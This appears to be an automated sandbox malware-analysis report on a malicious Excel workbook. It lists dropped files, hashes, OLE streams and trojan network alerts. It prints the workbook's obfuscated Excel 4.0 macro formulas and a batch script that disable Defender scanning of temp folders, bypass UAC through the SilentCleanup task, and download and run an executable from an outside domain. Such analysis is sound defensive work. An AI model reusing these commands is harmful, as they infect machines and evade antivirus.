.:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1.....%R....Desktop.d......QK.X%R....._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\061544\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......061544..........D_....3N...W...9r.[........}EkD_....3N...W...9r.[.*.......}Ek....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	245
Entropy (8bit):	4.539882120504497
Encrypted:	false
SSDEEP:	3:oyBVomMM5XQJQAyXXbBX1HVML/IgMpSqXQJQAyXXbBX1HVML/IgMpSmMM5XQJQAn:dj6q7tF+jIgmtF+jIgFq7tF+jIgR
MD5:	B069F1433E95E0835A5F47849C80D569
SHA1:	8B9AD65811CDC72E61AD5EAA96D3DCBD1DCC7ED1
SHA-256:	FEB8EF8DE63A557979BF3DDABA8A6060BADAF7D1AB1143A6AA1F47DF70876858
SHA-512:	28E07E413EFAE8E97558AB8A5311BB2D89CB6B6F72DFFFD63C14FB33EC899DF7D5DE4B2058615DE1C4EC32E1AB2E68EB480D3EEFE0022CFC6EA2FBD8E82A8985
Malicious:	false
Preview:	Desktop.LNK=0..[xls]..1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.LNK=0..1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.LNK=0..[xls]..1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0GIXF82C.txt Download File
Process:	C:\Users\user\AppData\Roaming\svchost.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	116
Entropy (8bit):	4.395352109058765
Encrypted:	false
SSDEEP:	3:GmM/l1zH+xYZjTUFCRKESNItQBVVfR/ReX:XM/nzvHW5Er6R5EX
MD5:	25DF76F2320E2DC6D352763F9ABC0581
SHA1:	13E2D554264F509E1DE6CB00A369460CC9954728
SHA-256:	C3C8CCD630DD46300F6746D2E57DEC07ACB09670F204E8862FA47FE9517F2FA2
SHA-512:	7814671CA7FFB50504273251D22D5F7A09EB151BFEF79CF22940535E40FF45BF0101393FD4BE0A6852E8E034777C3B4D775EB79A2F192B32BCC392D0B3FCF5B0
Malicious:	false
IE Cache URL:	cryptodual.net/
Preview:	__cfduid.d06f53df8ac0389b20d19542af55205061609784161.cryptodual.net/.9728.2691925632.30866008.3035335597.30860049.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\G7VTE4BUJJVJ02GNE19I.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.592064761270266
Encrypted:	false
SSDEEP:	96:chQCsMqaqvsqvJCwo0z8hQCsMqaqvsEHyqvJCworez2YYXHXf8H7lUVCIu:cyzo0z8ynHnorez2Lf8H1Iu
MD5:	6B364979C8767D2424D3C91EBDD89DCD
SHA1:	86CAAFAD50B9238F8458D82DE0730886D50B337F
SHA-256:	DCDA2C328C39B01FD373FEF9F670075B94CB1E40D06774C3FC2654272F6B183D
SHA-512:	396AAF0D2D9B215BF17D15D8D5F001CC4B51A08D778AF70A95D37D9FDB591BA4DA10CBFBF4DEAD1E425A66B68BA2F129AE89010F2B39A08B36486CB847AB258A
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NZDSA84RF84J59JBFTNC.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.592064761270266
Encrypted:	false
SSDEEP:	96:chQCsMqaqvsqvJCwo0z8hQCsMqaqvsEHyqvJCworez2YYXHXf8H7lUVCIu:cyzo0z8ynHnorez2Lf8H1Iu
MD5:	6B364979C8767D2424D3C91EBDD89DCD
SHA1:	86CAAFAD50B9238F8458D82DE0730886D50B337F
SHA-256:	DCDA2C328C39B01FD373FEF9F670075B94CB1E40D06774C3FC2654272F6B183D
SHA-512:	396AAF0D2D9B215BF17D15D8D5F001CC4B51A08D778AF70A95D37D9FDB591BA4DA10CBFBF4DEAD1E425A66B68BA2F129AE89010F2B39A08B36486CB847AB258A
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PB6OHLZ29ZGVS9S1BE0R.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.592064761270266
Encrypted:	false
SSDEEP:	96:chQCsMqaqvsqvJCwo0z8hQCsMqaqvsEHyqvJCworez2YYXHXf8H7lUVCIu:cyzo0z8ynHnorez2Lf8H1Iu
MD5:	6B364979C8767D2424D3C91EBDD89DCD
SHA1:	86CAAFAD50B9238F8458D82DE0730886D50B337F
SHA-256:	DCDA2C328C39B01FD373FEF9F670075B94CB1E40D06774C3FC2654272F6B183D
SHA-512:	396AAF0D2D9B215BF17D15D8D5F001CC4B51A08D778AF70A95D37D9FDB591BA4DA10CBFBF4DEAD1E425A66B68BA2F129AE89010F2B39A08B36486CB847AB258A
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PFQODHVM4U1PD38F6YPM.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.592064761270266
Encrypted:	false
SSDEEP:	96:chQCsMqaqvsqvJCwo0z8hQCsMqaqvsEHyqvJCworez2YYXHXf8H7lUVCIu:cyzo0z8ynHnorez2Lf8H1Iu
MD5:	6B364979C8767D2424D3C91EBDD89DCD
SHA1:	86CAAFAD50B9238F8458D82DE0730886D50B337F
SHA-256:	DCDA2C328C39B01FD373FEF9F670075B94CB1E40D06774C3FC2654272F6B183D
SHA-512:	396AAF0D2D9B215BF17D15D8D5F001CC4B51A08D778AF70A95D37D9FDB591BA4DA10CBFBF4DEAD1E425A66B68BA2F129AE89010F2B39A08B36486CB847AB258A
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TWOJT3O669AH3AZCWTO6.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.592064761270266
Encrypted:	false
SSDEEP:	96:chQCsMqaqvsqvJCwo0z8hQCsMqaqvsEHyqvJCworez2YYXHXf8H7lUVCIu:cyzo0z8ynHnorez2Lf8H1Iu
MD5:	6B364979C8767D2424D3C91EBDD89DCD
SHA1:	86CAAFAD50B9238F8458D82DE0730886D50B337F
SHA-256:	DCDA2C328C39B01FD373FEF9F670075B94CB1E40D06774C3FC2654272F6B183D
SHA-512:	396AAF0D2D9B215BF17D15D8D5F001CC4B51A08D778AF70A95D37D9FDB591BA4DA10CBFBF4DEAD1E425A66B68BA2F129AE89010F2B39A08B36486CB847AB258A
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z32BQNYTSAI4D5J8YUSI.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.592064761270266
Encrypted:	false
SSDEEP:	96:chQCsMqaqvsqvJCwo0z8hQCsMqaqvsEHyqvJCworez2YYXHXf8H7lUVCIu:cyzo0z8ynHnorez2Lf8H1Iu
MD5:	6B364979C8767D2424D3C91EBDD89DCD
SHA1:	86CAAFAD50B9238F8458D82DE0730886D50B337F
SHA-256:	DCDA2C328C39B01FD373FEF9F670075B94CB1E40D06774C3FC2654272F6B183D
SHA-512:	396AAF0D2D9B215BF17D15D8D5F001CC4B51A08D778AF70A95D37D9FDB591BA4DA10CBFBF4DEAD1E425A66B68BA2F129AE89010F2B39A08B36486CB847AB258A
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\svchost.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\ps.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1163264
Entropy (8bit):	7.915040849931152
Encrypted:	false
SSDEEP:	24576:8mPsVSYhARcvhjuhGThHjY5hl70pJNw77YqXKM345BcyIc:64Yhv8h6dYFwpJ6XJC5H
MD5:	128409D5CB9701CD12600BAF7A623794
SHA1:	5E1F8E2C9421B3F7CABA07AE6BE503D272EBB8EB
SHA-256:	80104E0AD490B44A632A15E5875E7626DB7F35FA94D7AADF19C45A621D75C7E0
SHA-512:	267BBE58582CC95E9C45C05F19DEF1DABC491C1C55F6FD16A82256430AD805CE90B6472D934F42E539A40B99D98509E3E3B5E2A21600EFEAF26BC10E6F698681
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2._..............P..v...H......6.... ........@.. ....................... ............@....................................O.......PE........................................................................... ............... ..H............text...<t... ...v.................. ..`.rsrc...PE.......F...x..............@..@.reloc..............................@..B........................H.......................j..()...........................................0............(....(..........(.....o..........................(.......( ......(!......("......(#....N..(....o....($....&..(%.....s&........s'........s(........s)........s............0...........~....o+....+...0...........~....o,....+...0...........~....o-....+...0...........~....o.....+...0...........~....o/....+..&..(0.......0..<........~.....(1.....,!r...p.....(2...o3...s4............~.....

C:\Users\user\Desktop\D4FE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Applesoft BASIC program data, first line number 16
Category:	dropped
Size (bytes):	178421
Entropy (8bit):	7.50264756586487
Encrypted:	false
SSDEEP:	3072:jLk3hbdlylKsgqopeJBWhZFGkE+cL2NdlbtEW1euanw2a3phbbJsrloqTknlAH9a:nk3hbdlylKsgqopeJBWhZFVE+W2Ndlbh
MD5:	C9EFF753C7AD61E408A9718A39AC6610
SHA1:	07886DA6E870BEA6D4DF13604118738425C2BF96
SHA-256:	B63C6383D9DEEA0537ACE46015AE1708A96815435D480BCB225D00BE272AD9D3
SHA-512:	EAC9E17AB079298285E7C392300027C0B51CECDDEC67B39B4B44283DDFDA34FC55DF91F8AF4A25C451D9E5CC0A09E414752FE0D6111B4B58448EB6891ACFE244
Malicious:	false
Preview:	........g2..........................\.p....user B.....a.........=..............ThisWorkbook....................................=........K^)8.......X.@...........".......................1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1. .................C.o.n.s.o.l.a.s.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6..

C:\Users\user\Documents\pd.bat Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	modified
Size (bytes):	2020
Entropy (8bit):	5.312948573774158
Encrypted:	false
SSDEEP:	48:dnjA3VfSB//7vUVfSB//7vQVfSB//7vEsAQ:dnM30F/Q0F/k0F/dAQ
MD5:	384D01463EABC7A8F4D815862000360D
SHA1:	2876CE40F37588B4AF437DDFC9A62FC46F4B4296
SHA-256:	F74736334D05832FD555A83F49C920A36580FD328792973B76EBAC6FC1A1A76C
SHA-512:	4CE8140330E9DF68F16580BD778D037A787EC6FB0175A7D406869878E0733D85A9A7B3B7D73A728ECF609C6A710BC684900D7A78B1F577292A1BFBEEDABB031B
Malicious:	true
Yara Hits:	Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: C:\Users\user\Documents\pd.bat, Author: Florian Roth Rule: JoeSecurity_ObfuscatedPowershell, Description: Yara detected Obfuscated Powershell, Source: C:\Users\user\Documents\pd.bat, Author: Joe Security
Preview:	mode 18,1..color FE..setlocal..for /f "tokens=4-5 delims=. " %%i in ('ver') do set VERSION=%%i.%%j..if "%version%" == "10.0" ( echo "Windows 10 detected" ..reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "$env:temp" ;Add-MpPreference -ExclusionPath "$env:appdata" ;Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;&REM " >nul..timeout /t 2 >nul..schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul..timeout /t 3 >nul..reg delete "HKCU\Environment" /v "windir" /F..)..if "%version%" == "6.3" ( echo "Windows 8.1 detected" ..reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "$env:temp" ;Add-MpPreference -ExclusionPath "$env:appdata" ;Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');St

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Last Saved By: blobijump, Create Time/Date: Sun Sep 20 22:17:44 2020, Last Saved Time/Date: Sun Jan 3 23:14:32 2021, Security: 1
Entropy (8bit):	7.633051633259433
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls
File size:	162304
MD5:	4468e0175c68f3751fc2027f1e42ca0c
SHA1:	c19aff367853c61d750b2da47623b69d8c1b42bb
SHA256:	4054344f07e1877b2cbb1a13c9bee260f0ae1f41c713374ccb9b130e3bae19a6
SHA512:	40ab75cb6da2ad826511fc9f26fb971dc634749ae218f0b19d80ba2c587257696647be80c169800b7434166308f5967e4ca6247a25604642cb8630a710cbdabe
SSDEEP:	3072:SVnSGiysRchNXHfA1MiWhZFGkEld+Dr7BbtEG1euinw2avphbLJBr1oibsnlYH9I:6nSGiysRchNXHfA1MiWhZFVEld+Dr7BE
File Content Preview:	........................;...................................:..................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls"

Indicators
Has Summary Info:	True
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
Last Saved By:	blobijump
Create Time:	2020-09-20 21:17:44
Last Saved Time:	2021-01-03 23:14:32
Security:	1

Document Summary
Document Code Page:	1252
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 276

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	276
Entropy:	3.16930549839
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . . . F e u i l l e s d e c a l c u l . . . . . . . . . . . . . . . . . M a c r o
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 98 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 156

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	156
Entropy:	3.29938329109
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . L . . . . . . . X . . . . . . . d . . . . . . . . . . . . . . . . . . . b l o b i j u m p . . . @ . . . . L . z . . . . @ . . . . . n 1 & . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 08 00 00 00 38 00 00 00 0c 00 00 00 4c 00 00 00 0d 00 00 00 58 00 00 00 13 00 00 00 64 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 0a 00 00 00 62 6c 6f 62 69 6a 75 6d 70 00 00 00 40 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 158653

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	158653
Entropy:	7.68301819978
Base64 Encoded:	True
Data ASCII:	. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . b l o b i j u m p B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p ^ ) 8 . . . . . . . X . @ . .
Data Raw:	09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 09 00 00 62 6c 6f 62 69 6a 75 6d 70 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

;;;;;;;112;;;;;;"=GET.CELL(5;L581)";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item """"pd""&CHAR(46)&""bat"""" -Destination """"$e`nV:T`EMP"""""")";;;;;;;;;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd""&CHAR(46)&""bat -Force"")";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd""&CHAR(46)&""bat"")";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 7;cd """"$e`nV:T`EMP; ./pd""&CHAR(46)&""bat"""""")";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 (nEw-oB`jecT Ne""&CHAR(116)&CHAR(46)&CHAR(87)&CHAR(101)&""bcLIENt).('Down'+'loadFile').In""&CHAR(118)&""oke('""&CHAR(104)&""ttps://cutt.ly/njaLDrp','pd""&CHAR(46)&""bat')"")";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/04/21-19:16:01.877513	TCP	2022985	ET TROJAN Trojan Generic - POST To gate.php with no accept headers	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:01.877513	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:02.870226	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:03.164615	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:03.550129	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:03.695875	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:08.788015	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:08.880536	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:08.968308	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:09.066074	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:14.156343	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
